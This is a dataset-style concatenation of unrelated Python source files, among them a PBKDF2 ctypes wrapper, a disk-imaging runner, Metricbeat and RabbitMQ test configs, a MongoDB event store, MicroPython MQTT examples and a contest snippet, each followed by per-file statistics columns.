hashlib.sha384: crypto.EVP_sha384,
hashlib.sha512: crypto.EVP_sha512}
crypto_hashfunc = hashlib_to_crypto_map.get(hashfunc)
if crypto_hashfunc is None:
raise ValueError('Unkwnown digest %s' % hashfunc)
crypto_hashfunc.restype = ctypes.c_void_p
return crypto_hashfunc()
def _openssl_pbkdf2(data, salt, iterations, digest, keylen):
"""OpenSSL compatibile wrapper
"""
c_hashfunc = ctypes.c_void_p(_openssl_hashlib_to_crypto_map_get(digest))
c_pass = ctypes.c_char_p(data)
c_passlen = ctypes.c_int(len(data))
c_salt = ctypes.c_char_p(salt)
c_saltlen = ctypes.c_int(len(salt))
c_iter = ctypes.c_int(iterations)
c_keylen = ctypes.c_int(keylen)
c_buff = ctypes.create_string_buffer(keylen)
# PKCS5_PBKDF2_HMAC(const char *pass, int passlen,
# const unsigned char *salt, int saltlen, int iter,
# const EVP_MD *digest,
# int keylen, unsigned char *out);
crypto.PKCS5_PBKDF2_HMAC.argtypes = [ctypes.c_char_p, ctypes.c_int,
ctypes.c_char_p, ctypes.c_int,
ctypes.c_int, ctypes.c_void_p,
ctypes.c_int, ctypes.c_char_p]
crypto.PKCS5_PBKDF2_HMAC.restype = ctypes.c_int
err = crypto.PKCS5_PBKDF2_HMAC(c_pass, c_passlen,
c_salt, c_saltlen,
c_iter,
c_hashfunc,
c_keylen,
c_buff)
return (err, c_buff)
try: # check that we have proper OpenSSL or Common Crypto on the system.
system = platform.system()
if system == 'Windows':
if platform.architecture()[0] == '64bit':
libname = ctypes.util.find_library('libeay64')
if not libname:
raise OSError('Library not found')
crypto = ctypes.CDLL(libname)
else:
libname = ctypes.util.find_library('libeay32')
if not libname:
raise OSError('Library libeay32 not found.')
crypto = ctypes.CDLL(libname)
_pbkdf2_hmac = _openssl_pbkdf2
crypto.PKCS5_PBKDF2_HMAC # test compatibility
elif system == 'Darwin': # think different(TM)! i.e. break things!
if [int(x) for x in platform.mac_ver()[0].split('.')] < [10, 7, 0]:
raise OSError('OS X Version too old %s < 10.7.0' % platform.mac_ver()[0])
libname = ctypes.util.find_library('System')
if not libname:
raise OSError('Library not found')
crypto = ctypes.CDLL(os.path.basename(libname))
_pbkdf2_hmac = _commoncrypto_pbkdf2
else:
libname = ctypes.util.find_library('crypto')
if not libname:
raise OSError('Library crypto not found.')
crypto = ctypes.CDLL(os.path.basename(libname))
_pbkdf2_hmac = _openssl_pbkdf2
crypto.PKCS5_PBKDF2_HMAC # test compatibility
except (OSError, AttributeError):
_, e, _ = sys.exc_info()
raise ImportError('Cannot find a compatible cryptographic library '
'on your system. %s' % e)
def pkcs5_pbkdf2_hmac(data, salt, iterations=1000, keylen=24, hashfunc=None):
if hashfunc is None:
hashfunc = hashlib.sha1
err, c_buff = _pbkdf2_hmac(data, salt, iterations, hashfunc, keylen)
if err == 0:
raise ValueError('wrong parameters')
return c_buff.raw[:keylen]
def pbkdf2_hex(data, salt, iterations=1000, keylen=24, hashfunc=None):
return binascii.hexlify(pkcs5_pbkdf2_hmac(data, salt, iterations, keylen, hashfunc))
def pbkdf2_bin(data, salt, iterations=1000, keylen=24, hashfunc=None):
return pkcs5_pbkdf2_hmac(data, salt, iterations, keylen, hashfunc)
if __name__ == '__main__':
try:
crypto.SSLeay_version.restype = ctypes.c_char_p
print(crypto.SSLeay_version(0))
except:
pass
import platform
if platform.python_version_tuple() < ('3', '0', '0'):
def bytes(*args):
return str(args[0])
for h in [hashlib.sha1, hashlib.sha224, hashlib.sha256,
hashlib.sha384, hashlib.sha512]:
print(binascii.hexlify(pkcs5_pbkdf2_hmac(bytes('secret', 'utf-8') * 11,
bytes('salt', 'utf-8'),
hashfunc=h)))
| 38.194872
| 88
| 0.569683
| 850
| 7,448
| 4.732941
| 0.223529
| 0.0609
| 0.041014
| 0.032811
| 0.49043
| 0.434999
| 0.338553
| 0.338553
| 0.272682
| 0.222719
| 0
| 0.034061
| 0.341702
| 7,448
| 194
| 89
| 38.391753
| 0.786457
| 0.116273
| 0
| 0.309353
| 0
| 0
| 0.054685
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057554
| false
| 0.05036
| 0.064748
| 0.021583
| 0.179856
| 0.014388
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
6ac1a5f132a19c0dca01d22ddfd3613255dba8b5
| 4,258
|
py
|
Python
|
wce_triage/ops/create_image_runner.py
|
pfrouleau/wce-triage-v2
|
25610cda55f5cb2170e13e121ae1cbaa92ef7626
|
[
"MIT"
] | 3
|
2019-07-25T03:24:23.000Z
|
2021-06-23T14:01:34.000Z
|
wce_triage/ops/create_image_runner.py
|
pfrouleau/wce-triage-v2
|
25610cda55f5cb2170e13e121ae1cbaa92ef7626
|
[
"MIT"
] | 1
|
2019-12-20T16:04:19.000Z
|
2019-12-20T16:04:19.000Z
|
wce_triage/ops/create_image_runner.py
|
pfrouleau/wce-triage-v2
|
25610cda55f5cb2170e13e121ae1cbaa92ef7626
|
[
"MIT"
] | 2
|
2019-07-25T03:24:26.000Z
|
2021-02-14T05:27:11.000Z
|
#!/usr/bin/env python3
#
# Create disk image
#
import re, sys, traceback
from .tasks import task_fetch_partitions, task_refresh_partitions, task_mount, task_remove_persistent_rules, task_remove_logs, task_fsck, task_shrink_partition, task_expand_partition, task_unmount
from .partclone_tasks import task_create_disk_image
from .ops_ui import console_ui
from ..components.disk import create_storage_instance
from .runner import Runner
from ..lib.disk_images import make_disk_image_name
from .json_ui import json_ui
from ..lib.util import init_triage_logger, is_block_device
# "Waiting", "Prepare", "Preflight", "Running", "Success", "Failed"]
my_messages = { "Waiting": "Saving disk is waiting.",
"Prepare": "Savign disk is preparing.",
"Preflight": "Saving disk is preparing.",
"Running": "{step} of {steps}: Running {task}",
"Success": "Saving disk completed successfully.",
"Failed": "Saving disk failed." }
#
class ImageDiskRunner(Runner):
'''Runner for creating disk image. does fsck, shrink partition, create disk
image and resize the file system back to the max.
For now, this is only dealing with the EXT4 linux partition.
'''
# FIXME: If I want to make this to a generic clone app, I need to deal with all of partitions on the disk.
# One step at a time.
def __init__(self, ui, runner_id, disk, destdir, suggestedname=None, partition_id='Linux'):
super().__init__(ui, runner_id)
self.time_estimate = 600
self.disk = disk
self.partition_id = partition_id
self.destdir = destdir
self.imagename = make_disk_image_name(destdir, suggestedname)
pass
def prepare(self):
super().prepare()
# self.tasks.append(task_mount_nfs_destination(self, "Mount the destination volume"))
self.tasks.append(task_fetch_partitions("Fetch partitions", self.disk))
self.tasks.append(task_refresh_partitions("Refresh partition information", self.disk))
self.tasks.append(task_mount("Mount the target disk", disk=self.disk, partition_id=self.partition_id))
self.tasks.append(task_remove_persistent_rules("Remove persistent rules", disk=self.disk, partition_id=self.partition_id))
self.tasks.append(task_remove_logs("Remove/Clean Logs", disk=self.disk, partition_id=self.partition_id))
task = task_unmount("Unmount target", disk=self.disk, partition_id=self.partition_id)
task.set_teardown_task()
self.tasks.append(task)
self.tasks.append(task_fsck("fsck partition", disk=self.disk, partition_id=self.partition_id))
self.tasks.append(task_shrink_partition("Shrink partition to smallest", disk=self.disk, partition_id=self.partition_id))
self.tasks.append(task_create_disk_image("Create disk image", disk=self.disk, partition_id=self.partition_id, imagename=self.imagename))
task = task_expand_partition("Expand the partion back", disk=self.disk, partition_id=self.partition_id)
task.set_teardown_task()
self.tasks.append(task)
pass
pass
if __name__ == "__main__":
tlog = init_triage_logger()
if len(sys.argv) == 1:
print( 'Unloader: devicename part destdir')
sys.exit(0)
# NOTREACHED
pass
devname = sys.argv[1]
if not is_block_device(devname):
print( '%s is not a block device.' % devname)
sys.exit(1)
# NOTREACHED
pass
part = sys.argv[2] # This is a partition id
destdir = sys.argv[3] # Destination directory
disk = create_storage_instance(devname)
# Preflight is for me to see the tasks. http server runs this with json_ui.
do_it = True
if destdir == "preflight":
ui = console_ui()
do_it = False
pass
elif destdir == "testflight":
ui = console_ui()
do_it = True
pass
else:
ui = json_ui(wock_event="saveimage", message_catalog=my_messages)
pass
if re.match(part, '\d+'):
part = int(part)
pass
runner_id = disk.device_name
runner = ImageDiskRunner(ui, runner_id, disk, destdir, partition_id=part)
try:
runner.prepare()
runner.preflight()
runner.explain()
runner.run()
sys.exit(0)
# NOTREACHED
except Exception as exc:
sys.stderr.write(traceback.format_exc(exc) + "\n")
sys.exit(1)
# NOTREACHED
pass
pass
| 35.190083
| 196
| 0.711837
| 593
| 4,258
| 4.903879
| 0.284992
| 0.079436
| 0.067056
| 0.071871
| 0.237276
| 0.18088
| 0.162311
| 0.162311
| 0.149243
| 0.134801
| 0
| 0.003726
| 0.180601
| 4,258
| 120
| 197
| 35.483333
| 0.829751
| 0.155707
| 0
| 0.27381
| 0
| 0
| 0.142457
| 0
| 0
| 0
| 0
| 0.008333
| 0
| 1
| 0.02381
| false
| 0.130952
| 0.107143
| 0
| 0.142857
| 0.02381
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
6ac3c0aa131a8fbf4b061367a8fbb2e23790a4c8
| 3,777
|
py
|
Python
|
metricbeat/module/postgresql/test_postgresql.py
|
SHolzhauer/beats
|
39679a536a22e8a0d7534a2475504488909d19fd
|
[
"ECL-2.0",
"Apache-2.0"
] | 4
|
2020-11-17T06:29:30.000Z
|
2021-08-08T11:56:01.000Z
|
metricbeat/module/postgresql/test_postgresql.py
|
SHolzhauer/beats
|
39679a536a22e8a0d7534a2475504488909d19fd
|
[
"ECL-2.0",
"Apache-2.0"
] | 36
|
2021-02-02T14:18:40.000Z
|
2022-03-20T15:07:30.000Z
|
metricbeat/module/postgresql/test_postgresql.py
|
SHolzhauer/beats
|
39679a536a22e8a0d7534a2475504488909d19fd
|
[
"ECL-2.0",
"Apache-2.0"
] | 6
|
2021-03-10T05:38:32.000Z
|
2021-08-16T13:11:19.000Z
|
import metricbeat
import os
import pytest
import sys
import unittest
class Test(metricbeat.BaseTest):
COMPOSE_SERVICES = ['postgresql']
def common_checks(self, output):
# Ensure no errors or warnings exist in the log.
self.assert_no_logged_warnings()
for evt in output:
top_level_fields = metricbeat.COMMON_FIELDS + ["postgresql"]
self.assertCountEqual(self.de_dot(top_level_fields), evt.keys())
self.assert_fields_are_documented(evt)
def get_hosts(self):
username = "postgres"
host = self.compose_host()
dsn = "postgres://{}?sslmode=disable".format(host)
return (
[dsn],
username,
os.getenv("POSTGRESQL_PASSWORD"),
)
@unittest.skipUnless(metricbeat.INTEGRATION_TESTS, "integration test")
@pytest.mark.tag('integration')
def test_activity(self):
"""
PostgreSQL module outputs an event.
"""
hosts, username, password = self.get_hosts()
self.render_config_template(modules=[{
"name": "postgresql",
"metricsets": ["activity"],
"hosts": hosts,
"username": username,
"password": password,
"period": "5s"
}])
proc = self.start_beat()
self.wait_until(lambda: self.output_lines() > 0)
proc.check_kill_and_wait()
output = self.read_output_json()
self.common_checks(output)
for evt in output:
assert "name" in evt["postgresql"]["activity"]["database"]
assert "oid" in evt["postgresql"]["activity"]["database"]
assert "state" in evt["postgresql"]["activity"]
@unittest.skipUnless(metricbeat.INTEGRATION_TESTS, "integration test")
@pytest.mark.tag('integration')
def test_database(self):
"""
PostgreSQL module outputs an event.
"""
hosts, username, password = self.get_hosts()
self.render_config_template(modules=[{
"name": "postgresql",
"metricsets": ["database"],
"hosts": hosts,
"username": username,
"password": password,
"period": "5s"
}])
proc = self.start_beat()
self.wait_until(lambda: self.output_lines() > 0)
proc.check_kill_and_wait()
output = self.read_output_json()
self.common_checks(output)
for evt in output:
assert "name" in evt["postgresql"]["database"]
assert "oid" in evt["postgresql"]["database"]
assert "blocks" in evt["postgresql"]["database"]
assert "rows" in evt["postgresql"]["database"]
assert "conflicts" in evt["postgresql"]["database"]
assert "deadlocks" in evt["postgresql"]["database"]
@unittest.skipUnless(metricbeat.INTEGRATION_TESTS, "integration test")
@pytest.mark.tag('integration')
def test_bgwriter(self):
"""
PostgreSQL module outputs an event.
"""
hosts, username, password = self.get_hosts()
self.render_config_template(modules=[{
"name": "postgresql",
"metricsets": ["bgwriter"],
"hosts": hosts,
"username": username,
"password": password,
"period": "5s"
}])
proc = self.start_beat()
self.wait_until(lambda: self.output_lines() > 0)
proc.check_kill_and_wait()
output = self.read_output_json()
self.common_checks(output)
for evt in output:
assert "checkpoints" in evt["postgresql"]["bgwriter"]
assert "buffers" in evt["postgresql"]["bgwriter"]
assert "stats_reset" in evt["postgresql"]["bgwriter"]
| 32.843478
| 76
| 0.581943
| 380
| 3,777
| 5.626316
| 0.247368
| 0.028064
| 0.084191
| 0.064546
| 0.697381
| 0.623012
| 0.579046
| 0.579046
| 0.579046
| 0.579046
| 0
| 0.00224
| 0.290707
| 3,777
| 114
| 77
| 33.131579
| 0.795819
| 0.041038
| 0
| 0.556818
| 0
| 0
| 0.182432
| 0.008164
| 0
| 0
| 0
| 0
| 0.170455
| 1
| 0.056818
| false
| 0.079545
| 0.056818
| 0
| 0.147727
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
6ac4ca9b00a8492410dc6166ad36ac8d64fdcffc
| 2,337
|
py
|
Python
|
rabbitmq/tests/common.py
|
jfmyers9/integrations-core
|
8793c784f1d5b2c9541b2dd4214dd91584793ced
|
[
"BSD-3-Clause"
] | 1
|
2021-03-24T13:00:14.000Z
|
2021-03-24T13:00:14.000Z
|
rabbitmq/tests/common.py
|
jfmyers9/integrations-core
|
8793c784f1d5b2c9541b2dd4214dd91584793ced
|
[
"BSD-3-Clause"
] | null | null | null |
rabbitmq/tests/common.py
|
jfmyers9/integrations-core
|
8793c784f1d5b2c9541b2dd4214dd91584793ced
|
[
"BSD-3-Clause"
] | null | null | null |
# (C) Datadog, Inc. 2018-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
import os
from packaging import version
from datadog_checks.base.utils.common import get_docker_hostname
HERE = os.path.dirname(os.path.abspath(__file__))
ROOT = os.path.dirname(os.path.dirname(HERE))
RABBITMQ_VERSION_RAW = os.environ['RABBITMQ_VERSION']
RABBITMQ_VERSION = version.parse(RABBITMQ_VERSION_RAW)
CHECK_NAME = 'rabbitmq'
HOST = get_docker_hostname()
PORT = 15672
URL = 'http://{}:{}/api/'.format(HOST, PORT)
CONFIG = {
'rabbitmq_api_url': URL,
'rabbitmq_user': 'guest',
'rabbitmq_pass': 'guest',
'queues': ['test1'],
'tags': ["tag1:1", "tag2"],
'exchanges': ['test1'],
}
CONFIG_NO_NODES = {
'rabbitmq_api_url': URL,
'rabbitmq_user': 'guest',
'rabbitmq_pass': 'guest',
'queues': ['test1'],
'tags': ["tag1:1", "tag2"],
'exchanges': ['test1'],
'collect_node_metrics': False,
}
CONFIG_REGEX = {
'rabbitmq_api_url': URL,
'rabbitmq_user': 'guest',
'rabbitmq_pass': 'guest',
'queues_regexes': [r'test\d+'],
'exchanges_regexes': [r'test\d+'],
}
CONFIG_VHOSTS = {
'rabbitmq_api_url': URL,
'rabbitmq_user': 'guest',
'rabbitmq_pass': 'guest',
'vhosts': ['/', 'myvhost'],
}
CONFIG_WITH_FAMILY = {
'rabbitmq_api_url': URL,
'rabbitmq_user': 'guest',
'rabbitmq_pass': 'guest',
'tag_families': True,
'queues_regexes': [r'(test)\d+'],
'exchanges_regexes': [r'(test)\d+'],
}
CONFIG_DEFAULT_VHOSTS = {
'rabbitmq_api_url': URL,
'rabbitmq_user': 'guest',
'rabbitmq_pass': 'guest',
'vhosts': ['/', 'test'],
}
CONFIG_TEST_VHOSTS = {
'rabbitmq_api_url': URL,
'rabbitmq_user': 'guest',
'rabbitmq_pass': 'guest',
'vhosts': ['test', 'test2'],
}
EXCHANGE_MESSAGE_STATS = {
'ack': 1.0,
'ack_details': {'rate': 1.0},
'confirm': 1.0,
'confirm_details': {'rate': 1.0},
'deliver_get': 1.0,
'deliver_get_details': {'rate': 1.0},
'publish': 1.0,
'publish_details': {'rate': 1.0},
'publish_in': 1.0,
'publish_in_details': {'rate': 1.0},
'publish_out': 1.0,
'publish_out_details': {'rate': 1.0},
'return_unroutable': 1.0,
'return_unroutable_details': {'rate': 1.0},
'redeliver': 1.0,
'redeliver_details': {'rate': 1.0},
}
| 23.606061
| 64
| 0.618314
| 291
| 2,337
| 4.694158
| 0.323024
| 0.023426
| 0.070278
| 0.076135
| 0.489751
| 0.418009
| 0.418009
| 0.418009
| 0.418009
| 0.418009
| 0
| 0.027749
| 0.182713
| 2,337
| 98
| 65
| 23.846939
| 0.687435
| 0.046213
| 0
| 0.341772
| 0
| 0
| 0.402247
| 0.011236
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.088608
| 0.037975
| 0
| 0.037975
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
6acc395ad3bfafbc612c2d532d32bbb5ce80e13f
| 4,123
|
py
|
Python
|
flink-ai-flow/lib/notification_service/notification_service/mongo_event_storage.py
|
lisy09/flink-ai-extended
|
011a5a332f7641f66086653e715d0596eab2e107
|
[
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 1
|
2021-08-06T04:24:36.000Z
|
2021-08-06T04:24:36.000Z
|
flink-ai-flow/lib/notification_service/notification_service/mongo_event_storage.py
|
sentimentist/flink-ai-extended
|
689d000f2db8919fd80e0725a1609918ca4a26f4
|
[
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null |
flink-ai-flow/lib/notification_service/notification_service/mongo_event_storage.py
|
sentimentist/flink-ai-extended
|
689d000f2db8919fd80e0725a1609918ca4a26f4
|
[
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 1
|
2021-05-20T02:17:11.000Z
|
2021-05-20T02:17:11.000Z
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import time
import socket
from collections import Iterable
from typing import Union, Tuple
from mongoengine import connect
from notification_service.event_storage import BaseEventStorage
from notification_service.base_notification import BaseEvent
from notification_service.mongo_notification import MongoEvent
class MongoEventStorage(BaseEventStorage):
def __init__(self, *args, **kwargs):
self.db_conn = self.setup_connection(**kwargs)
self.server_ip = socket.gethostbyname(socket.gethostname())
def setup_connection(self, **kwargs):
db_conf = {
"host": kwargs.get("host"),
"port": kwargs.get("port"),
"db": kwargs.get("db"),
}
username = kwargs.get("username", None)
password = kwargs.get("password", None)
authentication_source = kwargs.get("authentication_source", "admin")
if (username or password) and not (username and password):
raise Exception("Please provide valid username and password")
if username and password:
db_conf.update({
"username": username,
"password": password,
"authentication_source": authentication_source
})
return connect(**db_conf)
def get_latest_version(self, key: str, namespace: str = None):
mongo_events = MongoEvent.get_by_key(key, 0, 1, "-version")
if not mongo_events:
return 0
return mongo_events[0].version
def add_event(self, event: BaseEvent, uuid: str):
kwargs = {
"server_ip": self.server_ip,
"create_time": int(time.time() * 1000),
"event_type": event.event_type,
"key": event.key,
"value": event.value,
"context": event.context,
"namespace": event.namespace,
"sender": event.sender,
"uuid": uuid
}
mongo_event = MongoEvent(**kwargs)
mongo_event.save()
mongo_event.reload()
event.create_time = mongo_event.create_time
event.version = mongo_event.version
return event
def list_events(self,
key: Union[str, Tuple[str]],
version: int = None,
event_type: str = None,
start_time: int = None,
namespace: str = None,
sender: str = None):
key = None if key == "" else key
version = None if version == 0 else version
event_type = None if event_type == "" else event_type
namespace = None if namespace == "" else namespace
sender = None if sender == "" else sender
if isinstance(key, str):
key = (key,)
elif isinstance(key, Iterable):
key = tuple(key)
res = MongoEvent.get_base_events(key, version, event_type, start_time, namespace, sender)
return res
def list_all_events(self, start_time: int):
res = MongoEvent.get_base_events_by_time(start_time)
return res
def list_all_events_from_version(self, start_version: int, end_version: int = None):
res = MongoEvent.get_base_events_by_version(start_version, end_version)
return res
def clean_up(self):
MongoEvent.delete_by_client(self.server_ip)
| 38.175926
| 97
| 0.64031
| 494
| 4,123
| 5.192308
| 0.311741
| 0.024561
| 0.026901
| 0.023392
| 0.051462
| 0.041326
| 0
| 0
| 0
| 0
| 0
| 0.004329
| 0.271647
| 4,123
| 107
| 98
| 38.53271
| 0.849817
| 0.182391
| 0
| 0.037975
| 0
| 0
| 0.063544
| 0.01253
| 0
| 0
| 0
| 0
| 0
| 1
| 0.101266
| false
| 0.063291
| 0.101266
| 0
| 0.303797
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
0a77fdb1c15169709a632c8652ce9cffd62abd68
| 491
|
py
|
Python
|
jnpy/experiments/Qt/pyqtgraph_tutorial/codeloop_org_materials/c4_drawing_curves.py
|
jojoquant/jnpy
|
c874060af4b129ae09cee9f8542517b7b2f6573b
|
[
"MIT"
] | 5
|
2020-05-19T07:32:39.000Z
|
2022-03-14T09:09:48.000Z
|
jnpy/experiments/Qt/pyqtgraph_tutorial/codeloop_org_materials/c4_drawing_curves.py
|
jojoquant/jnpy
|
c874060af4b129ae09cee9f8542517b7b2f6573b
|
[
"MIT"
] | null | null | null |
jnpy/experiments/Qt/pyqtgraph_tutorial/codeloop_org_materials/c4_drawing_curves.py
|
jojoquant/jnpy
|
c874060af4b129ae09cee9f8542517b7b2f6573b
|
[
"MIT"
] | 3
|
2020-04-02T08:30:17.000Z
|
2020-05-03T12:12:05.000Z
|
# !/usr/bin/env python3
# -*- coding:utf-8 -*-
# @Datetime : 2019/11/14 上午2:26
# @Author : Fangyang
# @Software : PyCharm
import sys
from PyQt5.QtWidgets import QApplication
import pyqtgraph as pg
import numpy as np
app = QApplication(sys.argv)
x = np.arange(1000)
y = np.random.normal(size=(3, 1000))
plotWidget = pg.plot(title='Three plot curves')
for i in range(3):
plotWidget.plot(x, y[i], pen=(i, 3))
status = app.exec_()
sys.exit(status)
if __name__ == '__main__':
pass
| 19.64
| 47
| 0.678208
| 77
| 491
| 4.207792
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.060976
| 0.164969
| 491
| 24
| 48
| 20.458333
| 0.729268
| 0.230143
| 0
| 0
| 0
| 0
| 0.067204
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.071429
| 0.285714
| 0
| 0.285714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
0a99a93e656914b21bfd27861c1447d786a91bee
| 2,929
|
py
|
Python
|
MicroPython_BUILD/components/micropython/esp32/modules_examples/mqtt_example.py
|
FlorianPoot/MicroPython_ESP32_psRAM_LoBo
|
fff2e193d064effe36a7d456050faa78fe6280a8
|
[
"Apache-2.0"
] | 838
|
2017-07-14T10:08:13.000Z
|
2022-03-22T22:09:14.000Z
|
MicroPython_BUILD/components/micropython/esp32/modules_examples/mqtt_example.py
|
FlorianPoot/MicroPython_ESP32_psRAM_LoBo
|
fff2e193d064effe36a7d456050faa78fe6280a8
|
[
"Apache-2.0"
] | 395
|
2017-08-18T15:56:17.000Z
|
2022-03-20T11:28:23.000Z
|
MicroPython_BUILD/components/micropython/esp32/modules_examples/mqtt_example.py
|
FlorianPoot/MicroPython_ESP32_psRAM_LoBo
|
fff2e193d064effe36a7d456050faa78fe6280a8
|
[
"Apache-2.0"
] | 349
|
2017-09-02T18:00:23.000Z
|
2022-03-31T23:26:22.000Z
|
import network
def conncb(task):
print("[{}] Connected".format(task))
def disconncb(task):
print("[{}] Disconnected".format(task))
def subscb(task):
print("[{}] Subscribed".format(task))
def pubcb(pub):
print("[{}] Published: {}".format(pub[0], pub[1]))
def datacb(msg):
print("[{}] Data arrived from topic: {}, Message:\n".format(msg[0], msg[1]), msg[2])
mqtt = network.mqtt("loboris", "mqtt://loboris.eu", user="wifimcu", password="wifimculobo", cleansession=True, connected_cb=conncb, disconnected_cb=disconncb, subscribed_cb=subscb, published_cb=pubcb, data_cb=datacb)
# secure connection requires more memory and may not work
# mqtts = network.mqtt("eclipse", "mqtts//iot.eclipse.org", cleansession=True, connected_cb=conncb, disconnected_cb=disconncb, subscribed_cb=subscb, published_cb=pubcb, data_cb=datacb)
# wsmqtt = network.mqtt("eclipse", "ws://iot.eclipse.org:80/ws", cleansession=True, data_cb=datacb)
mqtt.start()
#mqtt.config(lwt_topic='status', lwt_msg='Disconected')
'''
# Wait until status is: (1, 'Connected')
mqtt.subscribe('test')
mqtt.publish('test', 'Hi from Micropython')
mqtt.stop()
'''
# ==================
# ThingSpeak example
# ==================
import network
def datacb(msg):
print("[{}] Data arrived from topic: {}, Message:\n".format(msg[0], msg[1]), msg[2])
thing = network.mqtt("thingspeak", "mqtt://mqtt.thingspeak.com", user="anyName", password="ThingSpeakMQTTid", cleansession=True, data_cb=datacb)
# or secure connection
#thing = network.mqtt("thingspeak", "mqtts://mqtt.thingspeak.com", user="anyName", password="ThingSpeakMQTTid", cleansession=True, data_cb=datacb)
thingspeakChannelId = "123456" # enter Thingspeak Channel ID
thingspeakChannelWriteApiKey = "ThingspeakWriteAPIKey" # EDIT - enter Thingspeak Write API Key
thingspeakFieldNo = 1
thingSpeakChanelFormat = "json"
pubchan = "channels/{:s}/publish/{:s}".format(thingspeakChannelId, thingspeakChannelWriteApiKey)
pubfield = "channels/{:s}/publish/fields/field{}/{:s}".format(thingspeakChannelId, thingspeakFieldNo, thingspeakChannelWriteApiKey)
subchan = "channels/{:s}/subscribe/{:s}/{:s}".format(thingspeakChannelId, thingSpeakChanelFormat, thingspeakChannelWriteApiKey)
subfield = "channels/{:s}/subscribe/fields/field{}/{:s}".format(thingspeakChannelId, thingspeakFieldNo, thingspeakChannelWriteApiKey)
thing.start()
tmo = 0
while thing.status()[0] != 2:
utime.sleep_ms(100)
tmo += 1
if tmo > 80:
print("Not connected")
break
# subscribe to channel
thing.subscribe(subchan)
# subscribe to field
thing.subscribe(subfield)
# publish to channel
# Payload can include any of those fields separated b< ';':
# "field1=value;field2=value;...;field8=value;latitude=value;longitude=value;elevation=value;status=value"
thing.publish(pubchan, "field1=25.2;status=On line")
# Publish to field
thing.publish(pubfield, "24.5")
| 33.284091
| 216
| 0.712188
| 347
| 2,929
| 5.965418
| 0.357349
| 0.02657
| 0.028986
| 0.031884
| 0.329469
| 0.315942
| 0.315942
| 0.236715
| 0.236715
| 0.236715
| 0
| 0.01428
| 0.115398
| 2,929
| 87
| 217
| 33.666667
| 0.784639
| 0.313418
| 0
| 0.162162
| 0
| 0
| 0.252552
| 0.11338
| 0
| 0
| 0
| 0
| 0
| 1
| 0.162162
| false
| 0.054054
| 0.054054
| 0
| 0.216216
| 0.189189
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
0a9deb518dd12c6a3961ce613b76fcc3db2acd68
| 602
|
py
|
Python
|
algorithm_training/abc87.py
|
hirotosuzuki/algorithm_training
|
3134bad4ea2ea57a77e05be6f21ba776a558f520
|
[
"MIT"
] | null | null | null |
algorithm_training/abc87.py
|
hirotosuzuki/algorithm_training
|
3134bad4ea2ea57a77e05be6f21ba776a558f520
|
[
"MIT"
] | null | null | null |
algorithm_training/abc87.py
|
hirotosuzuki/algorithm_training
|
3134bad4ea2ea57a77e05be6f21ba776a558f520
|
[
"MIT"
] | null | null | null |
class TaskA:
def run(self):
V, A, B, C = map(int, input().split())
pass
class TaskB:
def run(self):
A = int(input())
B = int(input())
C = int(input())
X = int(input())
counter = 0
for a in range(A+1):
for b in range(B+1):
for c in range(C+1):
total = 500 * a + 100 * b + 50 * c
if total == X:
counter += 1
print(counter)
class TaskC:
